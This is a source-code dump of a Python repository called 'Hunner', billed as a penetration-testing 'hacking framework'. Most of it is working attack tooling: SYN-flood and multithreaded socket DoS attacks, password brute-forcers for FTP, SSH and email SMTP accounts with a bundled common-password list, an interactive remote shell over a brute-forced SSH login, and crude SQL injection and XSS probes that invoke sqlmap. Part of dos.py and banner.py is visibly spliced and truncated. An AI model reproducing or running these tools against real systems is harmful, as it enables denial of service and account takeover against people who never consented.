├── .gitignore ├── README.md ├── hunner.py └── modules ├── banner.py ├── dos.py ├── ftp.py ├── hun_listener.py ├── mail.py ├── password └── password_list.txt └── ssh.py /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | env/ 12 | build/ 13 | develop-eggs/ 14 | dist/ 15 | downloads/ 16 | eggs/ 17 | .eggs/ 18 | lib/ 19 | lib64/ 20 | parts/ 21 | sdist/ 22 | var/ 23 | wheels/ 24 | *.egg-info/ 25 | .installed.cfg 26 | *.egg 27 | 28 | # PyInstaller 29 | # Usually these files are written by a python script from a template 30 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 31 | *.manifest 32 | *.spec 33 | 34 | # Installer logs 35 | pip-log.txt 36 | pip-delete-this-directory.txt 37 | 38 | # Unit test / coverage reports 39 | htmlcov/ 40 | .tox/ 41 | .coverage 42 | .coverage.* 43 | .cache 44 | nosetests.xml 45 | coverage.xml 46 | *.cover 47 | .hypothesis/ 48 | 49 | # Translations 50 | *.mo 51 | *.pot 52 | 53 | # Django stuff: 54 | *.log 55 | local_settings.py 56 | 57 | # Flask stuff: 58 | instance/ 59 | .webassets-cache 60 | 61 | # Scrapy stuff: 62 | .scrapy 63 | 64 | # Sphinx documentation 65 | docs/_build/ 66 | 67 | # PyBuilder 68 | target/ 69 | 70 | # Jupyter Notebook 71 | .ipynb_checkpoints 72 | 73 | # pyenv 74 | .python-version 75 | 76 | # celery beat schedule file 77 | celerybeat-schedule 78 | 79 | # SageMath parsed files 80 | *.sage.py 81 | 82 | # dotenv 83 | .env 84 | 85 | # virtualenv 86 | .venv 87 | venv/ 88 | ENV/ 89 | 90 | # Spyder project settings 91 | .spyderproject 92 | .spyproject 93 | 94 | # Rope project settings 95 | .ropeproject 96 | 97 | # mkdocs documentation 98 | /site 99 | 100 | # mypy 101 | .mypy_cache/ 102 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Hunner 2 | Hacking framework 3 | This framework is designed to perform penetration testing. 4 | Its functions: 5 | 1) Scan sql vulnerability 6 | 2) Scan xxs vulnerability 7 | 3) Dos sites 8 | 4) Brutforce Ftp 9 | 5) Brutforse SSh 10 | 6) Brutforse mail Accounts 11 | # Donate BTC: 1K96gLXbmgRhE7DsU33HFBuvohDgei5Z22 12 | -------------------------------------------------------------------------------- /hunner.py: -------------------------------------------------------------------------------- 1 | # Create python3 2 | # Author B3avers 3 | # 4 | import urllib.request as urllib2 5 | import re 6 | import sys,os 7 | import random 8 | 9 | H = '\033[95m' 10 | B = '\033[94m' 11 | G = '\033[92m' 12 | W = '\033[93m' 13 | F = '\033[91m' 14 | E = '\033[0m' 15 | U = '\033[4m' 16 | O = '\033[33m' 17 | 18 | def info(): 19 | VERSION = B+'1.0'+E 20 | AUTHOR = B+'B3-v3r'+E 21 | print(""" 22 | ################################# 23 | # # 24 | # Version-> %s # 25 | # # 26 | # Author-> %s # 27 | # # 28 | ################################# 29 | """ % (VERSION, AUTHOR)) 30 | def heads(): 31 | global head 32 | head = E+H+""" 33 | ```````````````````¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶ 34 | ```````````````¶¶¶`````````````````¶¶¶ 35 | ````````````¶¶````````````````````````¶¶¶ 36 | ```````````¶¶````````````````````````````¶¶ 37 | `````````¶¶````````````````````````````````¶ 38 | ````````¶¶`````````"""+W+'Hunner framework'+E+H+"""````````¶¶ 39 | ````````¶```````````"""+F+'Create B3-v3r'+H+"""```````````¶¶ 40 | ```````¶¶```````````````````````````````````¶¶ 41 | ```````¶`````````````````````````````````````¶ 42 | ```````¶`````````````"""+B+'Version 1.0'+H+"""`````````````¶ 43 | ```````¶`````````````````````````````````````¶ 44 | ```````¶¶```````````````````````````````````¶¶ 45 | ```````¶¶``````¶¶¶¶¶````````````¶¶¶¶¶```````¶¶ 46 | ````````¶`¶``¶¶¶¶¶¶¶¶¶````````¶¶¶¶¶¶¶¶¶`````¶¶ 47 | ````````¶¶``¶¶"""+F+'Hunner'+H+"""¶¶¶``````¶¶¶"""+F+'Hunner'+H+"""¶¶``¶¶¶ 48 | ````````¶¶``¶¶¶¶¶¶¶¶¶¶````````¶¶¶¶¶¶¶¶¶¶``¶¶ 49 | ````````¶`````¶¶¶¶```````````````¶¶¶¶¶`````¶¶ 50 | `````¶¶`¶¶``````````````¶`¶````````````````¶¶ 51 | ```¶¶```¶¶¶¶```````````¶¶`¶¶```````````````¶¶¶``¶¶ 52 | ``¶¶`````¶`¶¶¶¶¶¶¶````````¶````````¶¶¶¶¶¶¶¶¶`````¶¶ 53 | ```¶``````¶¶````¶¶````````````````¶``````¶¶`````¶¶ 54 | ``¶¶````````¶¶¶`¶¶¶`¶`¶``¶``¶``¶``¶````¶¶```````¶¶ 55 | ```¶¶¶``¶``````¶¶¶¶``````¶`````¶¶¶`¶¶¶``````````¶ 56 | ``````````¶¶¶¶¶````¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶`````¶¶¶¶¶¶¶¶ 57 | ```````````````¶¶¶````¶¶¶"""+W+'The'+H+"""¶¶`````¶¶¶¶ 58 | ``````````````````¶¶¶`"""+W+'Hacking'+H+"""``¶¶¶ 59 | ````````````````````¶¶¶``````¶¶¶¶ 60 | ````````````````¶¶¶`````¶¶¶¶¶````¶¶ 61 | ```````````¶```````¶¶¶¶``````¶¶¶```````¶¶ 62 | ```````````¶¶````¶¶`````````````¶¶``````¶ 63 | """+E 64 | def banner(): 65 | text1 = B+""" 66 | ___ 67 | ( ) 68 | | | .-. ___ ___ ___ .-. ___ .-. .--. ___ .-. 69 | | |/ \ ( )( ) ( ) \ ( ) \ / \ ( ) \ 70 | | .-. . | | | | | .-. . | .-. . | .-. ; | ' .-. ; 71 | | | | | | | | | | | | | | | | | | | | | | / (___) 72 | | | | | | | | | | | | | | | | | | ' _.' | | 73 | | | | | | | ; ' | | | | | | | | | .'.-. | | 74 | | | | | ' `-' / | | | | | | | | ' `-' / | | 75 | (___)(___) '.__.' (___)(___) (___)(___) `.__.' (___) 76 | """+F+'<<<<--------'+W+'The hacking framework'+F+'-------->>>>'+E 77 | text2 = O+""" 78 | _ _ 79 | | | | | 80 | | |_| |_ _ _ __ _ __ ___ _ __ 81 | | _ | | | | '_ \| '_ \ / _ \ '__| 82 | | | | | |_| | | | | | | | __/ | 83 | \_| |_/\__,_|_| |_|_| |_|\___|_| 84 | """+F+'<<<<---------'+W+'B3-v3r'+F+'--------->>>>'+E+F+'\n<<<<--------'+W+'The hacking framework'+F+'-------->>>>'+E 85 | text3 = F+""" 86 | ____ ____ 87 | |_ || _| 88 | | |__| | __ _ _ .--. _ .--. .---. _ .--. 89 | | __ | [ | | | [ `.-. | [ `.-. |/ /__\\[ `/'`\] 90 | _| | | |_ | \_/ |, | | | | | | | || \__., | | 91 | |____||____|'.__.'_/[___||__][___||__]'.__.'[___] 92 | 93 | """+B+'Version ='+W+' 1.0'+E 94 | ran = random.randrange(1, 4) 95 | if ran == 1: 96 | print(text1) 97 | elif ran == 2: 98 | print(text2) 99 | elif ran == 3: 100 | print(text3) 101 | 102 | def XXS(): 103 | os.system('clear') 104 | banner() 105 | print('Enter site:') 106 | try: 107 | site = input(B+'Hunner»XXS»'+E) 108 | except: 109 | print(F+'\nError'+E) 110 | 111 | if "http://" not in site and "https://"not in site: 112 | site = 'http://' + site 113 | else: 114 | pass 115 | 116 | if "id=" not in site: 117 | print(F+'[!]'+E+' Site dont have id parametrs') 118 | else: 119 | print(W+'[*]'+G+' Site '+site+' have "id" param') 120 | 121 | try: 122 | res = urllib2.urlopen(site) 123 | except: 124 | print(F+'[!] Site not work'+E) 125 | exit() 126 | 127 | try: 128 | print(W+'[+]'+G+' Site work'+E) 129 | scr = ';' 130 | site_xxs = site+scr 131 | res = urllib2.urlopen(site_xxs) 132 | info = res.info() 133 | print('################Info################\n') 134 | print(info) 135 | print('####################################\n') 136 | text = res.read() 137 | 138 | if "111111111111111111111" not in str(text): 139 | print(F+'[!]'+' Site not have XXs '+E) 140 | exit() 141 | else: 142 | print(U+W+'[++]'+B+' Site '+site +' have xxs vulnerability'+E) 143 | print(W+'Payload: '+G+site_xxs+E) 144 | sys.exit(1) 145 | 146 | except: 147 | print(F+'[!]'+' Fatal Error'+E) 148 | exit() 149 | def desc(): 150 | print(F+''' 151 | This program was created for review and not for causing harm. 152 | Usage of hunner for attacking targets without prior mutual consent is illegal. 153 | Developers assume no liability and are not responsible for any misuse or damage caused by this program. 154 | '''+E) 155 | 156 | def SQL(): 157 | os.system('clear') 158 | banner() 159 | print(G+'Enter site:'+E) 160 | site = input(B+'Hunner»SqlScaner»'+E) 161 | if "http://" not in site and "https://"not in site: 162 | site = 'http://' + site 163 | else: 164 | pass 165 | if "id=" not in site: 166 | print(F+'[!]'+E+' Site dont have id parametrs') 167 | else: 168 | print(W+'[*]'+G+' Site '+site+' have "id" param') 169 | try: 170 | res = urllib2.urlopen(site) 171 | print(W+'[+]'+G+' Site work'+E) 172 | except: 173 | print(F+'[!]'+E+' Site dont work') 174 | try: 175 | info = res.info() 176 | print('#####################Info#####################') 177 | print(info) 178 | print('##############################################') 179 | bad_site = site+'\'\"' 180 | res = urllib2.urlopen(bad_site) 181 | text = res.read() 182 | if 'You have an error in your SQL syntax' not in str(text): 183 | print(W+'[--]'+F+' Site '+site+' not have Sql Error'+E) 184 | else: 185 | print(W+'[++]'+H+' Site '+F+site+H+' have SQL Error '+E) 186 | print('Start sqlmap ?') 187 | y = input('Y/n->') 188 | if y == "Y" or y == 'y': 189 | os.system('sqlmap -u '+site+' --dbs') 190 | else: 191 | print(W+'<< Good by >> '+E) 192 | except: 193 | print(F+'Fatal error'+E) 194 | 195 | 196 | def Dos(): 197 | os.system('clear') 198 | banner() 199 | print('Enter site:') 200 | site = input(B+'Hunner»Dos»'+E) 201 | print('''Enter level: 202 | 1) High dos 203 | 2) Dos port 204 | 3) Low dos''') 205 | level = int(input(B+'Hunner»Dos»Level»'+E)) 206 | if level == 1: 207 | os.system('hping3 -S -P --flood -V '+site) 208 | if level == 2: 209 | port = input(B+'Hunner»Dos»Level»Port»'+E) 210 | os.system('hping3 -S -P --flood -V -p '+port+' '+ site) 211 | if level == 3: 212 | os.system('python3 modules/dos.py '+site) 213 | 214 | def SSH_Brut(): 215 | os.system('clear') 216 | banner() 217 | try: 218 | print(F+'Brutforse ssh mode!!'+E) 219 | print('Enter target host:') 220 | host = input(W+'Hunner»SSH»Host»'+E) 221 | print(G+'Enter username:'+E) 222 | print(G+'Default: admin'+E) 223 | user = input(W+'Hunner»SSH»User»'+E) 224 | if user == "": 225 | user = 'admin' 226 | print(G+'Enter password file:'+E) 227 | password = input(W+'Hunner»SSH»Password»'+E) 228 | 229 | if password == "": 230 | print('Enter password file') 231 | sys.exit(1) 232 | os.system('python3 modules/ssh.py '+host+' '+user+' '+password) 233 | except: 234 | print(F+' User aborting !!') 235 | exit() 236 | 237 | 238 | def FTP_Brut(): 239 | os.system('clear') 240 | banner() 241 | print(F+'Brutforse ftp mode!!'+E) 242 | print(B+'Enter host:'+E) 243 | host = input(W+'Hunner»Ftp»Host»'+E) 244 | print(B+'Enter user:'+E) 245 | print(F+'Default: admin') 246 | user = input(W+'Hunner»Ftp»User»'+E) 247 | print(B+'Enter password file:'+E) 248 | password_list = input(W+'Hunner»Ftp»Password»'+E) 249 | if user == '': 250 | user = 'admin' 251 | if password_list == '': 252 | print('Enter password list') 253 | sys.exit(1) 254 | os.system('python3 modules/ftp.py '+host+' '+user+' '+password_list) 255 | 256 | 257 | def mail(): 258 | os.system('clear') 259 | banner() 260 | print(H+'Brut mail account'+E) 261 | print(B+'Enter login:'+E) 262 | mail = input(W+'Hunner»Mail»Login»'+E) 263 | print(B+'Enter password list:'+E) 264 | password = input(W+'Hunner»Mail»Password»'+E) 265 | if password == '': 266 | print(F+'Password list: password/password_list.txt'+E) 267 | password = 'password/password_list.txt' 268 | os.system('python3 modules/mail.py '+mail+' '+password) 269 | 270 | def Main_Menu(): 271 | print(head) 272 | desc() 273 | print('\n') 274 | print(B+''' 275 | Menu sites: 276 | '''+E+''' 277 | 1) XXS 278 | 2) Sql 279 | 3) Dos site 280 | '''+W+'''-------------------'''+E) 281 | print(B + ''' 282 | Menu Brute: 283 | '''+E+''' 284 | 4) Brute Ftp 285 | 5) Brute SSH 286 | 6) Brute mails 287 | '''+W+'''-------------------\n'''+E) 288 | try: 289 | v = input('Hunner-»') 290 | except: 291 | print(' Good by ') 292 | exit() 293 | 294 | if v == 'help': 295 | info() 296 | elif int(v) == 1: 297 | XXS() 298 | elif int(v) == 2: 299 | SQL() 300 | elif int(v) == 3: 301 | Dos() 302 | elif int(v) == 4: 303 | FTP_Brut() 304 | elif int(v) == 5: 305 | SSH_Brut() 306 | elif int(v) == 6: 307 | mail() 308 | else: 309 | print(F+'[!]'+' You entered an incorrect value '+E) 310 | exit() 311 | heads() 312 | Main_Menu() 313 | -------------------------------------------------------------------------------- /modules/banner.py: -------------------------------------------------------------------------------- 1 | import random 2 | import os 3 | H = '\033[95m' 4 | B = '\033[94m' 5 | G = '\033[92m' 6 | W = '\033[93m' 7 | F = '\033[91m' 8 | E = '\033[0m' 9 | U = '\033[4m' 10 | O = '\033[33m' 11 | 12 | text1 = B+""" 13 | 14 | ,--. ,--. """+F+'Author: '+W+'B3@v3r'+B+""" ,--. ,--. ,--. 15 | | '--' |,--.,--.,--,--, | | `--' ,---.,-' '-. ,---. ,--,--, ,---. ,--.--. 16 | | .--. || || || \| | ,--.( .-''-. .-'| .-. :| \| .-. :| .--' 17 | | | | |' '' '| || || '--.| |.-' `) | | \ --.| || |\ --.| | 18 | `--' `--' `----' `--''--'`-----'`--'`----' `--' `----'`--''--' `----'`--' 19 | 20 | """+E 21 | text2 = G+""" 22 | _ _ _ _ _ 23 | | | | |_ _ _ __ | | (_)___| |_ ___ _ __ ___ _ __ 24 | | |_| | | | | '_ \| | | / __| __/ _ \ '_ \ / _ \ '__| 25 | | _ | |_| | | | | |___| \__ \ || __/ | | | __/ | 26 | |_| |_|\__,_|_| |_|_____|_|___/\__\___|_| |_|\___|_| 27 | 28 | """+E 29 | text3 = F+""" 30 | __ _ _ 31 | /\ /\_ _ _ __ / /(_)___| |_ ___ _ __ ___ _ __ 32 | / /_/ / | | | '_ \ / / | / __| __/ _ \ '_ \ / _ \ '__| 33 | / __ /| |_| | | | / /__| \__ \ || __/ | | | __/ | 34 | \/ /_/ \__,_|_| |_\____/_|___/\__\___|_| |_|\___|_| 35 | 36 | """+E 37 | text4 = O+""" 38 | __ __ __ __ __ 39 | / | / | / | / | / | 40 | $$ | $$ | __ __ _______ $$ | $$/ _______ _$$ |_ ______ _______ ______ ______ 41 | $$ |__$$ |/ | / |/ \ $$ | / | / |/ $$ | / \ / \ / \ / \ 42 | $$ $$ |$$ | $$ |$$$$$$$ |$$ | $$ |/$$$$$$$/ $$$$$$/ /$$$$$$ |$$$$$$$ |/$$$$$$ |/$$$$$$ | 43 | $$$$$$$$ |$$ | $$ |$$ | $$ |$$ | $$ |$$ \ $$ | __ $$ $$ |$$ | $$ |$$ $$ |$$ | $$/ 44 | $$ | $$ |$$ \__$$ |$$ | $$ |$$ |_____ $$ | $$$$$$ | $$ |/ |$$$$$$$$/ $$ | $$ |$$$$$$$$/ $$ | 45 | $$ | $$ |$$ $$/ $$ | $$ |$$ |$$ |/ $$/ $$ $$/ $$ |$$ | $$ |$$ |$$ | 46 | $$/ $$/ $$$$$$/ $$/ $$/ $$$$$$$$/ $$/ $$$$$$$/ $$$$/ $$$$$$$/ $$/ $$/ $$$$$$$/ $$/ 47 | 48 | 49 | """+E 50 | text5 = W+""" 51 | __ __ __ _ __ 52 | / // /__ __ ___ / / (_)___ / /_ ___ ___ ___ ____ 53 | / _ // // // _ \ / /__ / /(_-'+site+E) 34 | except socket.error: 35 | print('Site down') 36 | exit(1) 37 | def dos2(): 38 | while 1: 39 | dos() 40 | 41 | for i in range(1000): 42 | t[i] = threading.Thread(target=dos) 43 | for h in range(1000): 44 | l[h] = threading.Thread(target=dos2) 45 | for k in range(1000): 46 | t[k].start() 47 | l[k].start() -------------------------------------------------------------------------------- /modules/ftp.py: -------------------------------------------------------------------------------- 1 | from ftplib import FTP 2 | import time 3 | import os,sys 4 | import random 5 | import argparse 6 | 7 | method = 'ftp' 8 | 9 | H = '\033[95m' 10 | B = '\033[94m' 11 | G = '\033[92m' 12 | W = '\033[93m' 13 | F = '\033[91m' 14 | E = '\033[0m' 15 | U = '\033[4m' 16 | O = '\033[33m' 17 | 18 | parser = argparse.ArgumentParser(description="Framework Hunner") 19 | parser.add_argument('host', default='127.0.0.1', help=' Target host') 20 | parser.add_argument('user', default='admin', help=' Target user') 21 | parser.add_argument('file_password', help=' Password list') 22 | 23 | args = parser.parse_args() 24 | if args.host and args.user and args.file_password: 25 | user = args.user 26 | host = args.host 27 | file = args.file_password 28 | if os.path.exists(file): 29 | print(G+'Open file password'+W) 30 | text = open(file, 'r') 31 | else: 32 | print(F+'[!]'+'File not exists '+E) 33 | sys.exit(1) 34 | 35 | 36 | 37 | def connect(): 38 | for line in text: 39 | password = line.strip('\r\n') 40 | try: 41 | ftp = FTP(host) 42 | ft = ftp.login(user,password) 43 | print(G+time.ctime()+E+'Work user-> '+F+user+E+' work password-> '+F+password+E) 44 | print(E+'Connect ' +host+' ?') 45 | yes = input('Y/n') 46 | if yes == 'y' or yes == 'Y': 47 | print(G+'Ftp connect'+E) 48 | time.sleep(1) 49 | os.system('ftp '+host) 50 | break 51 | else: 52 | break 53 | except: 54 | print(O+time.ctime()+E+' '+'Not work user-> '+B+user+E+' paswword->'+B+password+E) 55 | sys.exit(1) 56 | connect() -------------------------------------------------------------------------------- /modules/hun_listener.py: -------------------------------------------------------------------------------- 1 | import time 2 | import os,sys 3 | import socket 4 | from pexpect import pxssh 5 | import re 6 | import argparse 7 | 8 | H = '\033[95m' 9 | B = '\033[94m' 10 | G = '\033[92m' 11 | W = '\033[93m' 12 | F = '\033[91m' 13 | E = '\033[0m' 14 | U = '\033[4m' 15 | O = '\033[33m' 16 | 17 | parser = argparse.ArgumentParser() 18 | parser.add_argument('host', help='Target host SSH') 19 | parser.add_argument('user', help='Target username SSH') 20 | parser.add_argument('password', help='Target password SSH') 21 | parser.add_argument('method', help=' SSH' ) 22 | args = parser.parse_args() 23 | if args.host and args.user and args.password: 24 | host = args.host 25 | user = args.user 26 | method = args.method 27 | password = args.password 28 | 29 | def clear(): 30 | os.system('clear') 31 | 32 | def banner(): 33 | os.system('python3 banner.py ') 34 | 35 | def connect_ssh(): 36 | print 'Start SSH mode' 37 | ssh = pxssh.pxssh() 38 | try: 39 | ssh.login(host, user , password) 40 | print G+'Start session->'+host+E 41 | except: 42 | print F+'Error connect ssh'+E 43 | sys.exit(1) 44 | while True: 45 | print 'Enter comand' 46 | try: 47 | cmd = raw_input(B+'Cmd->'+E) 48 | except KeyboardInterrupt: 49 | print "Detect Ctrl+C" 50 | sys.exit('Good bye ;)') 51 | if cmd == "exit": 52 | sys.exit('Good by ;)') 53 | 54 | ssh.sendline(cmd) 55 | ssh.prompt() 56 | data = ssh.before 57 | print data 58 | 59 | 60 | def main(): 61 | clear() 62 | banner() 63 | print 'Time: '+time.ctime() 64 | print F+'Start HunListener'+E 65 | print G+'Target host -> '+W+host+E 66 | print G+'Target user -> '+W+user+E 67 | print G+'Target password-> '+W+password+E 68 | if method == 'ssh': 69 | connect_ssh() 70 | main() -------------------------------------------------------------------------------- /modules/mail.py: -------------------------------------------------------------------------------- 1 | import smtplib 2 | import os,sys 3 | import time,random 4 | import threading 5 | import argparse 6 | 7 | H = '\033[95m' 8 | B = '\033[94m' 9 | G = '\033[92m' 10 | W = '\033[93m' 11 | F = '\033[91m' 12 | E = '\033[0m' 13 | U = '\033[4m' 14 | O = '\033[33m' 15 | 16 | serv = None 17 | port = 587 18 | 19 | os.chdir('modules/') 20 | parser = argparse.ArgumentParser(description="Framework Hunner") 21 | parser.add_argument('login', help='Target email') 22 | parser.add_argument('password', help='Password list') 23 | args = parser.parse_args() 24 | 25 | if args.login or args.password: 26 | login = args.login 27 | password_list = args.password 28 | if os.path.exists(password_list): 29 | file = open(password_list,'r') 30 | else: 31 | print(F+'File not exist'+E) 32 | sys.exit(1) 33 | def banner(): 34 | text1 = ''' 35 | ___ ___ _ _ _ _ 36 | | \/ | (_) | | | | 37 | | . . | __ _ _| | |_| |_ _ _ __ _ __ ___ _ __ 38 | | |\/| |/ _` | | | _ | | | | '_ \| '_ \ / _ \ '__| 39 | | | | | (_| | | | | | | |_| | | | | | | | __/ | 40 | \_| |_/\__,_|_|_\_| |_/\__,_|_| |_|_| |_|\___|_| 41 | 42 | 43 | ''' 44 | text2 = ''' 45 | _ _ 46 | /\/\ __ _(_) | /\ /\_ _ _ __ _ __ ___ _ __ 47 | / \ / _` | | |/ /_/ / | | | '_ \| '_ \ / _ \ '__| 48 | / /\/\ \ (_| | | / __ /| |_| | | | | | | | __/ | 49 | \/ \/\__,_|_|_\/ /_/ \__,_|_| |_|_| |_|\___|_| 50 | 51 | ''' 52 | if random.randrange(0,1) == 0: 53 | print(text1) 54 | else: 55 | print(text2) 56 | def clear(): 57 | os.system('clear') 58 | 59 | def check_mail(): 60 | global serv 61 | clear() 62 | banner() 63 | print(B+'Enter servese smtp:'+E) 64 | print(H+""" 65 | 1) Gmail 66 | 2) Outlook 67 | 3) Yahoo 68 | 4) At&T 69 | 5) Mail.com 70 | 6) Comcast 71 | 7) By hand 72 | """+E) 73 | ServerSmtp = input(W+'Hunner»Mail»ServerSmtp»'+E) 74 | if int(ServerSmtp) == 1: 75 | serv = 'smtp.gmail.com' 76 | port = 465 77 | elif int(ServerSmtp) == 2: 78 | serv = 'smtp-mail.outlook.com' 79 | port = 587 80 | elif int(ServerSmtp) == 3: 81 | serv = 'smtm.mail.yahoo.com' 82 | port = 587 83 | elif int(ServerSmtp) == 4: 84 | serv = 'smtm.mail.att.net' 85 | port = 465 86 | elif int(ServerSmtp) == 5: 87 | serv = 'smtm.mail.com' 88 | port = 587 89 | elif int(ServerSmtp) == 6: 90 | serv = 'smtm.comcast.com' 91 | port = 587 92 | elif int(ServerSmtp) == 7: 93 | serv = input('Enter smtp server (Exemple:smtp.gmail.com)') 94 | port = input('Enter port smtp server (Default port: 587)') 95 | else: 96 | print('Error ') 97 | sys.exit(1) 98 | 99 | def brut(): 100 | print(F+'Start brutforse'+E) 101 | try: 102 | smtp = smtplib.SMTP(str(serv), int(port)) 103 | smtp.ehlo() 104 | smtp.starttls() 105 | except: 106 | print(error) 107 | for line in file: 108 | try: 109 | passw = line.strip('\r\n') 110 | smtp.login(login, passw) 111 | print(W+time.ctime()+B+' Work mail login-> '+W+login+B+' password-> '+W+passw) 112 | break 113 | sys.exit(1) 114 | except: 115 | print(F + time.ctime() + E + ' Not work ->'+E+login+E+'Password ->'+E+passw) 116 | 117 | check_mail() 118 | t1 = threading.Thread(target=brut) 119 | t1.start() 120 | -------------------------------------------------------------------------------- /modules/password/password_list.txt: -------------------------------------------------------------------------------- 1 | 12345 2 | 54321 3 | adobe123 4 | 12345678 5 | qwerty 6 | 1234567 7 | 111111 8 | photoshop 9 | 123123 10 | 1234567890 11 | 000000 12 | abc123 13 | 1234 14 | adobe1 15 | macromedia 16 | azerty 17 | iloveyou 18 | aaaaaa 19 | 654321 20 | 12345 21 | 666666 22 | sunshine 23 | 123321 24 | letmein 25 | monkey 26 | asdfgh 27 | password1 28 | shadow 29 | princess 30 | dragon 31 | adobeadobe 32 | daniel 33 | computer 34 | michael 35 | 121212 36 | charlie 37 | master 38 | superman 39 | qwertyuiop 40 | 112233 41 | asdfasdf 42 | jessica 43 | 1q2w3e4r 44 | welcome 45 | 1qaz2wsx 46 | 987654321 47 | fdsa 48 | 753951 49 | chocolate 50 | fuckyou 51 | soccer 52 | tigger 53 | asdasd 54 | thomas 55 | asdfghjkl 56 | internet 57 | michelle 58 | football 59 | 123qwe 60 | zxcvbnm 61 | dreamweaver 62 | 7777777 63 | maggie 64 | qazwsx 65 | baseball 66 | jennifer 67 | jordan 68 | abcd1234 69 | trustno1 70 | buster 71 | 555555 72 | liverpool 73 | abc 74 | whatever 75 | 11111111 76 | 102030 77 | 123123123 78 | andrea 79 | pepper 80 | nicole 81 | killer 82 | abcdef 83 | hannah 84 | test 85 | alexander 86 | andrew 87 | 222222 88 | joshua 89 | freedom 90 | samsung 91 | asdfghj 92 | purple 93 | ginger 94 | 123654 95 | matrix 96 | secret 97 | summer 98 | 1q2w3e 99 | snoopy1 100 | -------------------------------------------------------------------------------- /modules/ssh.py: -------------------------------------------------------------------------------- 1 | import time 2 | import sys 3 | import os 4 | from pexpect import pxssh 5 | import argparse 6 | import threading 7 | 8 | method = 'ssh' 9 | O = '\033[33m' 10 | E = '\033[0m' 11 | F = '\033[91m' 12 | B = '\033[94m' 13 | G = '\033[92m' 14 | password_true = '' 15 | parser = argparse.ArgumentParser() 16 | parser.add_argument('host', help='Target host') 17 | parser.add_argument('user', help='Target username') 18 | parser.add_argument('password', help='Target password file') 19 | args = parser.parse_args() 20 | 21 | if args.host and args.user and args.password: 22 | HOST = args.host 23 | USER = args.user 24 | 25 | try: 26 | PASSWORD = open(args.password, 'r') 27 | print(O+'[*]'+E+' Open file password'+E) 28 | except: 29 | print(F+'[--] File not found'+E) 30 | exit(0) 31 | else: 32 | print('Error ! Check monual programm') 33 | exit(0) 34 | 35 | 36 | def brut(): 37 | print(G+'Start brut SSH') 38 | for line in PASSWORD: 39 | password = line.strip('\r\n') 40 | s = pxssh.pxssh() 41 | try: 42 | s.login(HOST, USER, password) 43 | print(O+time.ctime()+' '+G+'SSH connect user->'+B+USER+G+' paswword-> '+B+password+E) 44 | password_true = password 45 | break 46 | except: 47 | #print(error) 48 | print(O+time.ctime()+' '+E+'Not work user-> '+B+USER+E+' paswword-> '+B+password+E) 49 | if password_true == '': 50 | print(G+' Not open sesssion') 51 | sys.exit(1) 52 | print(F+'Open session!!'+E) 53 | print('Start HunListener ??') 54 | y = input('Y/n>') 55 | if y == 'Y' or y == 'y': 56 | os.chdir('modules/') 57 | comand = 'python hun_listener.py '+ HOST +' '+USER+' '+' '+password_true+' '+method 58 | os.system(comand) 59 | else: 60 | sys.exit(1) 61 | t1 = threading.Thread(target=brut) 62 | t1.start() --------------------------------------------------------------------------------